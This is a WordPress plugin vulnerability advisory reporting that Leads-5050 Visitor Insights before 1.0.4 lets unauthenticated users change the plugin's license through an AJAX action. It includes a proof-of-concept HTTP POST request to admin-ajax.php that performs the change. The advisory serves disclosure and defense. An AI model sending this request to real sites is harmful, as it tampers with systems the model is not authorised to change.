WordPress Plugin Vulnerabilities
Leads-5050 Visitor Insights < 1.0.4 - Unauthenticated License Change
Description
The leads5050_set_license AJAX action was available to unauthenticated users allowing them to set an arbitrary license in the plugins settings
Proof of Concept
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 46 Connection: close action=leads5050_set_license&api_license=AAAA2
Affects Plugins
References
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-05-07 (about 3 years ago)
Added
2021-05-07 (about 3 years ago)
Last Updated
2021-05-07 (about 3 years ago)